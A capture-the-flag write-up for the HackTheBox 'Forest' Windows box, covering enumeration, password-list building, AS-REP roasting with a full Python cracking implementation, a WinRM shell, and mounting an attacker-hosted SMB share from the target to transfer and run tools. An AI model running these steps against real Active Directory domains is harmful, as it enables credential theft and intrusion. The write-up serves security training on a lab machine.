# HackTheBox - Forest

![Easy Windows Machine by HTB](/files/-MXuTGWWKo8C0tAXn-sh)

Let's start off with a simple nmap scan (default scripts and version detection) for open ports and services.

```
nmap -sC -sV -oA nmap-forest 10.10.10.161
```

![nmap scan results](/files/-MXuWZ7gYafml8Zzbkg0)

We keep a full-port Nmap scan running in the background and start enumerating with what we already have.

```
nmap -A -p- -T4 -oA nmap-forest-all-port-scan 10.10.10.161
```

### Enumerating SMB

In case you don't have smbclient and smbmap installed on the system:

```
apt-get install smbclient smbmap
```

![](/files/-MXuYNDD_Ud1f0RlWWOh)

No shares are listed with an anonymous (null-session) login.

### Enumerating LDAP

```
apt-get install ldap-utils
```

![](/files/-MXu_2fOHqZyG0VdddlS)

Running a query with the filter `(objectClass=Person)` returns every user object in the domain:

![](/files/-MXualzzQqgY4W8JQgjr)

That is a lot of data to wade through. The following query pulls only the `sAMAccountName` attribute and writes the account names to a file. The grep is anchored to the start of the line because ldapsearch also prints a `# requesting: sAMAccountName` comment that would otherwise end up in the list as `requesting:`. (On newer ldap-utils `-h` is deprecated in favour of `-H ldap://10.10.10.161`.)

```
ldapsearch -x -h 10.10.10.161 -b "DC=htb,DC=local" '(objectClass=Person)' sAMAccountName | grep '^sAMAccountName:' | awk '{print $2}' > ldap-users.txt
```

![](/files/-MXuc9qfWn8t0mRwj8e_)
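The grep/awk pipeline above is fine for this box, but ldapsearch emits any non-ASCII value base64-encoded on an `attr:: value` line and folds long values onto continuation lines, both of which the one-liner mangles. The following added example (written for this writeup, not part of the original page or of ldap-utils) parses saved ldapsearch output as LDIF and extracts the account names correctly; `SAMPLE_LDIF` is constructed to show the comment line, a folded `dn`, and a base64 value, and the user names in it other than `svc-alfresco` are invented.

```python
import base64

# Constructed sample of ldapsearch output (LDIF); not captured from the box.
SAMPLE_LDIF = """\
# extended LDIF
#
# filter: (objectClass=Person)
# requesting: sAMAccountName
#

# Guest, Users, htb.local
dn: CN=Guest,CN=Users,DC=htb,DC=local
sAMAccountName: Guest

# svc-alfresco, Service Accounts, htb.local
dn: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
sAMAccountName: svc-alfresco

# jsmith, Some Very Long Organizational Unit Name, htb.local
dn: CN=jsmith,OU=Some Very Long Organizational Unit Name,
 DC=htb,DC=local
sAMAccountName: jsmith

# jurgen, Users, htb.local
dn: CN=jurgen,CN=Users,DC=htb,DC=local
sAMAccountName:: asO8cmdlbg==

# search result
search: 2
result: 0 Success
"""


def ldif_entries(text):
    """Yield each LDIF entry as {attribute: [values]}.

    Skips '#' comment lines, joins folded continuation lines (leading space)
    back onto the previous line, and decodes 'attr:: base64' values.
    """
    lines = []
    for raw in text.splitlines():
        if raw.startswith("#"):
            continue
        if raw.startswith(" ") and lines:      # folded continuation line
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entry = {}
    for line in lines + [""]:                  # trailing "" flushes the last entry
        if not line:
            if entry:
                yield entry
            entry = {}
            continue
        attr, _, value = line.partition(":")
        if value.startswith(":"):              # "attr:: <base64>"
            value = base64.b64decode(value[1:].strip()).decode("utf-8")
        else:
            value = value.strip()
        entry.setdefault(attr, []).append(value)


def sam_account_names(text):
    """Return the sAMAccountName of every entry that has one, in output order."""
    return [e["sAMAccountName"][0] for e in ldif_entries(text) if "sAMAccountName" in e]


if __name__ == "__main__":
    # Real use: sam_account_names(open("ldap-dump.ldif").read())
    print("\n".join(sam_account_names(SAMPLE_LDIF)))
```

Note that the naive pipeline would have produced `requesting:` as a user and `asO8cmdlbg==` instead of `jürgen`; the parser yields four clean names.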

Next we build a custom password list with a little bash. Start from a seed list (`pwlist.txt`) of common words such as Autumn, Spring and Password, and append the years most likely to appear in a freshly set password.

```
while read -r i; do
  echo "$i"; echo "${i}2019"; echo "${i}2020"
done < pwlist.txt > custom-pwlist.txt
```

We also run hashcat with its best64 rule set in `--stdout` mode, which applies the rules to each word and prints the candidates instead of cracking anything, to produce a larger and more promising wordlist.

```
hashcat.exe --force --stdout -r best64.rule pwlist.txt
```
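Hashcat's `best64.rule` is a list of one-line mangling rules; each rule is a sequence of single-character commands such as `c` (capitalise) or `$9` (append `9`). To show what the rule engine is doing to our seed words, here is an added example (written for this writeup, not code from hashcat or from the original page) that interprets the subset of the rule language needed for the year/season candidates built above and deduplicates the result. The command set is an assumption limited to the commands named in the docstring; hashcat's full language is much larger.

```python
def apply_rule(rule, word):
    """Apply one hashcat-style rule string to a word.

    Supported commands (a subset of hashcat's rule language):
      ':' no-op, 'l' lowercase, 'u' uppercase, 'c' capitalise,
      'r' reverse, 'd' duplicate, '$X' append char X, '^X' prepend char X,
      ']' delete last char, '[' delete first char. Spaces are ignored.
    """
    i = 0
    while i < len(rule):
        cmd = rule[i]
        if cmd in ": ":
            pass
        elif cmd == "l":
            word = word.lower()
        elif cmd == "u":
            word = word.upper()
        elif cmd == "c":
            word = word[:1].upper() + word[1:].lower()
        elif cmd == "r":
            word = word[::-1]
        elif cmd == "d":
            word = word * 2
        elif cmd == "]":
            word = word[:-1]
        elif cmd == "[":
            word = word[1:]
        elif cmd in "$^":
            i += 1
            if i >= len(rule):
                raise ValueError(f"rule {rule!r}: {cmd} needs a character argument")
            word = word + rule[i] if cmd == "$" else rule[i] + word
        else:
            raise ValueError(f"unsupported rule command {cmd!r} in {rule!r}")
        i += 1
    return word


def expand(words, rules):
    """Apply every rule to every word, keeping first-seen order and dropping
    duplicates (hashcat --stdout does not deduplicate; a spray list should)."""
    seen, out = set(), []
    for w in words:
        for r in rules:
            cand = apply_rule(r, w)
            if cand and cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


def season_year_rules(years=(2019, 2020), suffixes=("", "!")):
    """Rules equivalent to the bash loop on this page, generalised: the word
    as-is and capitalised, each optionally followed by a year and a suffix."""
    rules = []
    for case in (":", "c"):
        for year in ("",) + tuple(str(y) for y in years):
            for suffix in suffixes:
                rules.append(case + "".join("$" + ch for ch in year + suffix))
    return rules


if __name__ == "__main__":
    seeds = ["autumn", "spring", "password"]   # constructed seed list
    for candidate in expand(seeds, season_year_rules()):
        print(candidate)
```

Feeding the seed words through `season_year_rules()` yields twelve candidates per word (for example `Autumn2019!`); if a seed is already capitalised, the `:` and `c` variants collide and the duplicate is dropped.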

### Checking the password policy with crackmapexec

Before spraying anything, dump the domain password policy (crackmapexec's `--pass-pol` option) to see whether a lockout threshold is set:

![](/files/-MXv0-Eu-TueTU6q5wJO)

We can also use rpcclient over a null session to enumerate users and their attributes.

```
rpcclient -U '' -N 10.10.10.161
```

![](/files/-MXv1A7eNBqdKDrZxtZQ)

rpcclient offers many query commands (`enumdomusers`, `queryuser`, `getdompwinfo` and so on) for enumerating users. Here we discover a service account named `svc-alfresco`.

![](/files/-MXv2WH18FHCGM0LMV1w)

![](/files/-MXv2xqGLLtOQXhuN9du)

Since the lockout threshold (`PasswordLockoutThreshold`) is set to None, wrong guesses will not lock accounts, so we can brute-force or spray the users we found.

### Getting Shell Access

We will use impacket's GetNPUsers.py. It lists the accounts that have 'Do not require Kerberos preauthentication' set (`UF_DONT_REQUIRE_PREAUTH`) and requests a TGT for each of them. Because the KDC answers without proof of the password, the encrypted part of the AS-REP (which is encrypted with a key derived from the account's password) can be cracked offline.

This is the AS-REP Roasting attack.

![](/files/-MXv7SvCRFx77i-_kFDo)

Make sure the hash is in hashcat format: either pass `-format hashcat` to GetNPUsers.py, or insert the etype field `23$` after the `$krb5asrep$` prefix of the john-style line. hashcat cracks this format with mode 18200 (Kerberos 5 AS-REP etype 23).

![](/files/-MXv7ZZFGU95RjHfjmGG)

The password then cracks with hashcat (`-m 18200`) and the rockyou.txt wordlist.

![](/files/-MXv8-w6w7sviPjWUvYJ)

![](/files/-MXv8OwdbmjSOnV5E2ug)
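To make concrete what GetNPUsers.py hands us and what hashcat does with it in the two steps above, the following added example (written for this writeup; it is not impacket or hashcat code) implements RC4-HMAC (etype 23) from RFC 4757 for the AS-REP enc-part (key usage 8). It forges a cipher blob for a password we choose, rewrites the john-style hash line into the hashcat `-m 18200` layout, and then runs the offline guess loop that hashcat performs: derive K1 from the candidate's NT hash, recover K3 from the checksum, RC4-decrypt, and accept when the HMAC over the plaintext matches the checksum. The principal `svc-alfresco@HTB.LOCAL` comes from the box; the password `Autumn2019`, the wordlist, the plaintext stand-in and the all-zero confounder are constructed for the demo (a real KDC uses random bytes and an ASN.1 `EncASRepPart`). MD4 is implemented by hand because hashlib's md4 is disabled under OpenSSL 3 on most current distributions.

```python
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (needed for the NT hash)."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, list(range(16)), (3, 7, 11, 19), 0),
        (G, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (H, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, order, shifts, const in rounds:
            for i, k in enumerate(order):   # registers rotate: 16 steps == 4 full turns
                a = _rotl((a + fn(b, c, d) + X[k] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):                     # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                        # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


AS_REP_USAGE = struct.pack("<I", 8)          # key usage 8 = AS-REP enc-part (RFC 4757)


def rc4_hmac_encrypt(password: str, plaintext: bytes, confounder: bytes) -> bytes:
    """checksum || RC4(K3, confounder || plaintext), as the KDC would produce."""
    k1 = hmac_md5(nt_hash(password), AS_REP_USAGE)
    data = confounder + plaintext
    checksum = hmac_md5(k1, data)
    return checksum + rc4(hmac_md5(k1, checksum), data)


def parse_asrep(line: str):
    """Parse '$krb5asrep$[23$]user@REALM:edata1$edata2' (john or hashcat form)."""
    if not line.startswith("$krb5asrep$"):
        raise ValueError("not an AS-REP hash")
    body = line[len("$krb5asrep$"):]
    if body.startswith("23$"):               # hashcat form carries the etype
        body = body[3:]
    principal, _, rest = body.partition(":")
    edata1, _, edata2 = rest.partition("$")
    user, _, realm = principal.partition("@")
    if len(edata1) != 32 or not edata2:      # checksum is 16 bytes = 32 hex chars
        raise ValueError("malformed AS-REP hash")
    return user, realm, bytes.fromhex(edata1), bytes.fromhex(edata2)


def to_hashcat(line: str) -> str:
    """Rewrite an AS-REP hash line into the hashcat -m 18200 layout."""
    user, realm, edata1, edata2 = parse_asrep(line)
    return f"$krb5asrep$23${user}@{realm}:{edata1.hex()}${edata2.hex()}"


def crack_asrep(line: str, wordlist):
    """Offline guessing loop; returns the matching password or None."""
    _, _, checksum, edata2 = parse_asrep(line)
    for pw in wordlist:
        k1 = hmac_md5(nt_hash(pw), AS_REP_USAGE)
        plain = rc4(hmac_md5(k1, checksum), edata2)
        if hmac.compare_digest(hmac_md5(k1, plain), checksum):
            return pw
    return None


# Constructed demo data (assumptions for this example, not values from the box).
DEMO_PASSWORD = "Autumn2019"
DEMO_CIPHER = rc4_hmac_encrypt(DEMO_PASSWORD, b"EncASRepPart-stand-in", b"\x00" * 8)
DEMO_JOHN = f"$krb5asrep$svc-alfresco@HTB.LOCAL:{DEMO_CIPHER[:16].hex()}${DEMO_CIPHER[16:].hex()}"
DEMO_WORDLIST = ["password", "Spring2020", "Autumn2019", "Winter2019"]

if __name__ == "__main__":
    print(to_hashcat(DEMO_JOHN))
    print("cracked:", crack_asrep(to_hashcat(DEMO_JOHN), DEMO_WORDLIST))
```

The point worth noticing is that nothing in the loop touches the KDC: one AS-REP is enough, and every guess costs an MD4, three HMAC-MD5s and an RC4 pass, which is why hashcat chews through rockyou.txt in seconds.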

We have read access to `NETLOGON` and `SYSVOL` shares.

Since we now have a valid username and password for the svc-alfresco service account, we can use evil-winrm to get a shell on the box over WinRM.

![](/files/-MXv9WCu19GrMTuVF9Dw)

user.txt is present in `C:\Users\svc-alfresco\Desktop`.

### Setting up an SMB share with impacket and mounting it with New-PSDrive

First we set up an authenticated share on the attacking machine with smbserver.py from impacket. The share is called `PleaseWork`, serves the current directory, and requires the username and password in `$USER` and `$PASS`:

```
python3 /opt/impacket/examples/smbserver.py PleaseWork $(pwd) -smb2support -username $USER -password $PASS
```

![](/files/-MXvRn7i1rOoWeGL5v63)

We need to transfer winPEAS.exe to the target for local enumeration, so we will move it over the SMB share. Put winPEAS.exe in the share directory before starting the server.

To create a PSDrive (mount the share) with the credentials the server expects, we first need a credential object.

**Creating the credential object and mounting the share:**

```
# Wrap the password smbserver.py was started with as a SecureString
$pass = ConvertTo-SecureString 'injoker@123' -AsPlainText -Force
# Build the credential object for that user
$cred = New-Object System.Management.Automation.PSCredential('akshay', $pass)
# Mount the attacker's share as a PSDrive named "akshay"
New-PSDrive -Name akshay -PSProvider FileSystem -Credential $cred -Root \\10.10.14.2\PleaseWork
```

![](/files/-MXvUg-CEEBrm4ziHvGF)

We can browse the share and even run the files in it, since we have authenticated ourselves with the credentials the server expects.

![](/files/-MXvVCn0uFCKj2TLPrGS)

